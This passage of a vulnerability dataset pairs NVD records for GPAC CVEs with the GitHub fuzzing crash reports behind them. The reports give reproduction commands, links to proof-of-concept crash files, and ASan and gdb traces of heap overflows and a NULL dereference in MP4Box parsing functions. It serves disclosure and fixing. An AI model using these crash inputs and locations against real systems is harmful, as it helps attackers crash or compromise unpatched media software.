System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (master 6ada10e) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-ReadGF_IPMPX_WatermarkingInit ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/POC-ReadGF_IPMPX_WatermarkingInit ASAN info: ```C ==26293==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efb1 at pc 0x7ffff6ef6904 bp 0x7fffffff7e90 sp 0x7fffffff7638 WRITE of size 40 at 0x60200000efb1 thread T0 #0 0x7ffff6ef6903 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c903) #1 0x4709b5 in memcpy /usr/include/x86_64-linux-gnu/bits/string3.h:53 #2 0x4709b5 in gf_bs_read_data utils/bitstream.c:461 #3 0x7bc40d in ReadGF_IPMPX_WatermarkingInit odf/ipmpx_code.c:1517 #4 0x7bc40d in GF_IPMPX_ReadData odf/ipmpx_code.c:2020 #5 0x7beab7 in gf_ipmpx_data_parse odf/ipmpx_code.c:293 #6 0x7a97c9 in gf_odf_read_ipmp odf/odf_code.c:2426 #7 0x795b43 in gf_odf_parse_descriptor odf/descriptors.c:159 #8 0x7afa76 in gf_odf_desc_read odf/odf_codec.c:302 #9 0xad3e13 in esds_Read isomedia/box_code_base.c:1256 #10 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #11 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #12 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #13 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #14 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #15 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #16 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan/applications/mp4box/main.c:4767 #17 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #18 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) 0x60200000efb1 is located 0 bytes to the right of 1-byte region [0x60200000efb0,0x60200000efb1) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7bc3bf in ReadGF_IPMPX_WatermarkingInit odf/ipmpx_code.c:1516 #2 0x7bc3bf in GF_IPMPX_ReadData odf/ipmpx_code.c:2020 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy Shadow bytes around the buggy address: 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c047fff9df0: fa fa fa fa fa fa[01]fa fa fa 00 00 fa fa 00 00 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==26293==ABORTING ``` gdb info: ```C 7ffff70cd000-7ffff72cc000 ---p 00016000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cc000-7ffff72cd000 rw-p 00015000 08:02 67633677 /lib/x86_64-linux-gnu/libgcc_s.so.1 7ffff72cd000-7ffff748d000 r-xp 00000000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff748d000-7ffff768d000 ---p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff768d000-7ffff7691000 r--p 001c0000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7691000-7ffff7693000 rw-p 001c4000 08:02 67637542 /lib/x86_64-linux-gnu/libc-2.23.so 7ffff7693000-7ffff7697000 rw-p 00000000 00:00 0 7ffff7697000-7ffff76b0000 r-xp 00000000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff76b0000-7ffff78af000 ---p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78af000-7ffff78b0000 r--p 00018000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b0000-7ffff78b1000 rw-p 00019000 08:02 67633774 /lib/x86_64-linux-gnu/libz.so.1.2.8 7ffff78b1000-7ffff79b9000 r-xp 00000000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff79b9000-7ffff7bb8000 ---p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb8000-7ffff7bb9000 r--p 00107000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bb9000-7ffff7bba000 rw-p 00108000 08:02 67637545 /lib/x86_64-linux-gnu/libm-2.23.so 7ffff7bba000-7ffff7bd2000 r-xp 00000000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7bd2000-7ffff7dd1000 ---p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd1000-7ffff7dd2000 r--p 00017000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd2000-7ffff7dd3000 rw-p 00018000 08:02 67637529 /lib/x86_64-linux-gnu/libpthread-2.23.so 7ffff7dd3000-7ffff7dd7000 rw-p 00000000 00:00 0 7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7fe3000-7ffff7fe8000 rw-p 00000000 00:00 0 7ffff7ff7000-7ffff7ff8000 rw-p 00000000 00:00 0 7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0 [vvar] 7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0 [vdso] 7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:02 67637528 /lib/x86_64-linux-gnu/ld-2.23.so 7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0 7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] Program received signal SIGABRT, Aborted. 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff7302428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff730402a in __GI_abort () at abort.c:89 #2 0x00007ffff73447ea in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff745ded8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007ffff734d37a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7ffff745df50 "free(): invalid next size (fast)", action=3) at malloc.c:5006 #4 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0) at malloc.c:3867 #5 0x00007ffff735153c in __GI___libc_free (mem=<optimized out>) at malloc.c:2968 #6 0x0000000000568b82 in DelGF_IPMPX_OpaqueData (_p=<optimized out>) at odf/ipmpx_code.c:1205 #7 gf_ipmpx_data_del (_p=_p@entry=0x9cc760) at odf/ipmpx_code.c:1835 #8 0x00000000005624bd in gf_odf_del_ipmp (ipmp=0x9cc670) at odf/odf_code.c:2390 #9 0x000000000055a031 in gf_odf_parse_descriptor (bs=bs@entry=0x9cc610, desc=desc@entry=0x9cc578, desc_size=desc_size@entry=0x7fffffff9694) at odf/descriptors.c:176 #10 0x0000000000564f7b in gf_odf_desc_read (raw_desc=raw_desc@entry=0x9cc590 "\v@\377\377\377\377", descSize=descSize@entry=108, outDesc=outDesc@entry=0x9cc578) at odf/odf_codec.c:302 #11 0x00000000006ca6f4 in esds_Read (s=0x9cc550, bs=0x9cb460) at isomedia/box_code_base.c:1256 #12 0x00000000005137e1 in gf_isom_box_read (bs=0x9cb460, a=0x9cc550) at isomedia/box_funcs.c:1528 #13 gf_isom_box_parse_ex (outBox=outBox@entry=0x7fffffff9800, bs=bs@entry=0x9cb460, is_root_box=is_root_box@entry=GF_TRUE, parent_type=0) at isomedia/box_funcs.c:208 #14 0x0000000000513e15 in gf_isom_parse_root_box (outBox=outBox@entry=0x7fffffff9800, bs=0x9cb460, bytesExpected=bytesExpected@entry=0x7fffffff9850, progressive_mode=progressive_mode@entry=GF_FALSE) at isomedia/box_funcs.c:42 #15 0x000000000051b4fe in gf_isom_parse_movie_boxes (mov=mov@entry=0x9cb010, bytesMissing=bytesMissing@entry=0x7fffffff9850, progressive_mode=progressive_mode@entry=GF_FALSE) at isomedia/isom_intern.c:206 #16 0x000000000051c48c in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, bytesMissing=0x7fffffff9850, mov=0x9cb010) at isomedia/isom_intern.c:194 #17 gf_isom_open_file (fileName=0x7fffffffe627 "./real-crashs/POC-ReadGF_IPMPX_WatermarkingInit", OpenMode=0, tmp_dir=0x0) at isomedia/isom_intern.c:615 #18 0x000000000041c082 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at main.c:4767 #19 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe358, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe348) at ../csu/libc-start.c:291 #20 0x000000000040eba9 in _start () ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
AddressSanitizer: heap-buffer-overflow in ReadGF_IPMPX_WatermarkingInit at ipmpx_code.c:1517
https://api.github.com/repos/gpac/gpac/issues/1320/comments
2
2019-10-28T15:50:52Z
2020-01-08T12:43:16Z
https://github.com/gpac/gpac/issues/1320
513,392,746
1,320
956
CVE-2019-20162
2019-12-31T00:15:12.507
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is heap-based buffer overflow in the function gf_isom_box_parse_ex() in isomedia/box_funcs.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1327" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1327" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1327
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-gf_isom_box_parse_ex ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_isom_box_parse_ex https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_isom_box_parse_ex-2 For POC-new-gf_isom_box_parse_ex gdb info: ```C Program received signal SIGSEGV, Segmentation fault. __GI___libc_free (mem=0x6a06e81bf20d02) at malloc.c:2951 2951 malloc.c: No such file or directory. (gdb) bt #0 __GI___libc_free (mem=0x6a06e81bf20d02) at malloc.c:2951 #1 0x00000000006d4ab7 in reftype_del () #2 0x0000000000512a7d in gf_isom_box_del () #3 0x00000000005135fe in gf_isom_box_array_read_ex () #4 0x00000000005137e1 in gf_isom_box_parse_ex.constprop () #5 0x0000000000513e15 in gf_isom_parse_root_box () #6 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #7 0x000000000051c48c in gf_isom_open_file () #8 0x000000000041c082 in mp4boxMain () #9 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #10 0x000000000040eba9 in _start () ``` For POC-new-gf_isom_box_parse_ex-2 gdb info: ```C Program received signal SIGSEGV, Segmentation fault. __GI___libc_free (mem=0x1c1c1c1c1c1c1c1c) at malloc.c:2951 2951 malloc.c: No such file or directory. (gdb) bt #0 __GI___libc_free (mem=0x1c1c1c1c1c1c1c1c) at malloc.c:2951 #1 0x00000000006d4ab7 in reftype_del () #2 0x0000000000512a7d in gf_isom_box_del () #3 0x00000000005135fe in gf_isom_box_array_read_ex () #4 0x00000000005137e1 in gf_isom_box_parse_ex.constprop () #5 0x0000000000513e15 in gf_isom_parse_root_box () #6 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #7 0x000000000051c48c in gf_isom_open_file () #8 0x000000000041c082 in mp4boxMain () #9 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #10 0x000000000040eba9 in _start () ``` For POC-new-gf_isom_box_parse_ex ASAN info: ```C ==25783==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000df80 at pc 0x0000006c4392 bp 0x7fffffff8090 sp 0x7fffffff8080 WRITE of size 4 at 0x60400000df80 thread T0 #0 0x6c4391 in gf_isom_box_parse_ex isomedia/box_funcs.c:189 #1 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #2 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #3 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #4 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #5 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #6 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #7 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #8 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #9 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) 0x60400000df80 is located 0 bytes to the right of 48-byte region [0x60400000df50,0x60400000df80) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xaec17d in reftype_New isomedia/box_code_base.c:7521 SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/box_funcs.c:189 gf_isom_box_parse_ex Shadow bytes around the buggy address: 0x0c087fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9be0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00 =>0x0c087fff9bf0:[fa]fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==25783==ABORTING ``` For POC-new-gf_isom_box_parse_ex-2 ```C ASAN info: ==25917==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000e000 at pc 0x0000006c4392 bp 0x7fffffff8090 sp 0x7fffffff8080 WRITE of size 4 at 0x60400000e000 thread T0 #0 0x6c4391 in gf_isom_box_parse_ex isomedia/box_funcs.c:189 #1 0x6c47bc in gf_isom_box_array_read_ex isomedia/box_funcs.c:1419 #2 0x6c5114 in gf_isom_box_read isomedia/box_funcs.c:1528 #3 0x6c5114 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #4 0x6c5974 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #5 0x6da6a0 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #6 0x6dd2f3 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:194 #7 0x6dd2f3 in gf_isom_open_file isomedia/isom_intern.c:615 #8 0x42f88a in mp4boxMain /home/aota09/yyp/fuzzcompare/test/gpac/test-crash/build_asan_00dfc93/applications/mp4box/main.c:4767 #9 0x7ffff638082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x41e228 in _start (/home/aota09/yyp/fuzzcompare/test/gpac/test-crash/bin_asan/bin/MP4Box+0x41e228) 0x60400000e000 is located 0 bytes to the right of 48-byte region [0x60400000dfd0,0x60400000e000) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0xaec17d in reftype_New isomedia/box_code_base.c:7521 SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/box_funcs.c:189 gf_isom_box_parse_ex Shadow bytes around the buggy address: 0x0c087fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9be0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bf0: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00 =>0x0c087fff9c00:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==25917==ABORTING ``` --- Edit This bug issue still exists in latest version 0.8.0: 4c19ae5 and 0.9.0: 1de1f8d --- Addition: This bug was found with our fuzzer, which is based on AFL. Our fuzzer is developed by Yuanpingyu(cfenicey@gmail.com) 、Yanhao and Marsman1996(lqliuyuwei@outlook.com)
ERROR: AddressSanitizer: heap-buffer-overflow in gf_isom_box_parse_ex isomedia/box_funcs.c:189
https://api.github.com/repos/gpac/gpac/issues/1327/comments
2
2019-11-09T11:12:14Z
2020-01-08T12:43:37Z
https://github.com/gpac/gpac/issues/1327
520,392,881
1,327
957
CVE-2019-20163
2019-12-31T00:15:12.587
An issue was discovered in GPAC version 0.8.0 and 0.9.0-development-20191109. There is a NULL pointer dereference in the function gf_odf_avc_cfg_write_bs() in odf/descriptors.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1335" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1335" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:gpac:gpac:0.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "1EA85977-716F-48A1-8199-B8A7847AF223", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1335
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, gpac (latest master 00dfc93) Compile Command: ``` $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ``` $ MP4Box -diso -out /dev/null $POC-new-gf_odf_avc_cfg_write_bs ``` POC file: https://github.com/Clingto/POC/blob/master/gpac-MP4Box/gpac-00dfc93-crashes/POC-new-gf_odf_avc_cfg_write_bs gdb info: ```C Program received signal SIGSEGV, Segmentation fault. 0x000000000055aeee in gf_odf_avc_cfg_write_bs () (gdb) bt #0 0x000000000055aeee in gf_odf_avc_cfg_write_bs () #1 0x000000000055b1ff in gf_odf_avc_cfg_write () #2 0x00000000004f9ba1 in AVC_RewriteESDescriptorEx () #3 0x00000000006cf2a8 in video_sample_entry_Read () #4 0x0000000000512ce5 in gf_isom_box_parse_ex () #5 0x000000000051333b in gf_isom_box_array_read_ex () #6 0x0000000000512ce5 in gf_isom_box_parse_ex () #7 0x000000000051333b in gf_isom_box_array_read_ex () #8 0x00000000006d09d0 in stbl_Read () #9 0x0000000000512ce5 in gf_isom_box_parse_ex () #10 0x000000000051333b in gf_isom_box_array_read_ex () #11 0x00000000006ce02b in minf_Read () #12 0x0000000000512ce5 in gf_isom_box_parse_ex () #13 0x000000000051333b in gf_isom_box_array_read_ex () #14 0x00000000006cd2f0 in mdia_Read () #15 0x0000000000512ce5 in gf_isom_box_parse_ex () #16 0x000000000051333b in gf_isom_box_array_read_ex () #17 0x00000000006d351d in trak_Read () #18 0x0000000000512ce5 in gf_isom_box_parse_ex () #19 0x000000000051333b in gf_isom_box_array_read_ex () #20 0x00000000006ce545 in moov_Read () #21 0x00000000005137e1 in gf_isom_box_parse_ex.constprop () #22 0x0000000000513e15 in gf_isom_parse_root_box () #23 0x000000000051b4fe in gf_isom_parse_movie_boxes.part () #24 0x000000000051c48c in gf_isom_open_file () #25 0x000000000041c082 in mp4boxMain () #26 0x00007ffff72ed830 in __libc_start_main (main=0x40eb70 <main>, argc=5, argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe308) at ../csu/libc-start.c:291 #27 0x000000000040eba9 in _start () ``` ASAN info: ```C ASAN:SIGSEGV ================================================================= ==25871==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x000000797a2b bp 0x60200000ed98 sp 0x7fffffff7230 T0) #0 0x797a2a in gf_odf_avc_cfg_write_bs odf/descriptors.c:567 #1 0x79821e in gf_odf_avc_cfg_write odf/descriptors.c:631 #2 0x68b393 in AVC_RewriteESDescriptorEx isomedia/avc_ext.c:1063 #3 0xaddd66 in video_sample_entry_Read isomedia/box_code_base.c:4408 #4 0x6c3d6e in gf_isom_box_read isomedia/box_funcs.c:1528 #5 0x6c3d6e in gf_isom_box_parse_ex 